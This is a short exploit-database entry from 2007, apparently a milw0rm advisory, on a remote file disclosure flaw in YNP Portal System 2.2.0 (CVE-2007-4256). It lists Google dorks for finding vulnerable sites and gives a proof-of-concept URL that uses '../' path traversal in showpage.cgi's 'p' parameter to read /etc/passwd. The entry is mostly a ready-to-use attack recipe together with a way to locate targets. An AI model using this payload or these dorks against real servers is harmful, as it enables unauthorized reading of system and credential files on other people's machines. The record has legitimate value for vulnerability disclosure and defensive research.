YNP Portal System 2.2.0 - 'showpage.cgi p' Remote File Disclosure

EKU-ID: 12217	CVE: OSVDB-39198;CVE-2007-4256	OSVDB-ID:
Author: GoLd_M	Published: 2007-08-06	Verified:
Download:

Rating

☆☆☆☆☆

#################################################################################
# YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure Vulnerability #
# D0RK : inurl:"showpage.cgi?p=popsearch.html"                               #
#      : inurl:"showpage.cgi?p=support.html"                                 #
#      : inurl:"showpage.cgi?p=dialup.html"                                  #
#      : inurl:"showpage.cgi?p="                                             #
# POC: http://xxxx.com/showpage.cgi?p=../../../../../../etc/passwd           #
# Discovered by: GolD_M = [Mahmood_ali]                                      #
# Thanx To : Tryag-Team & Asbmay's Group & bd0rk & Cold Zero & All My Friends   #
#################################################################################

# milw0rm.com [2007-08-06]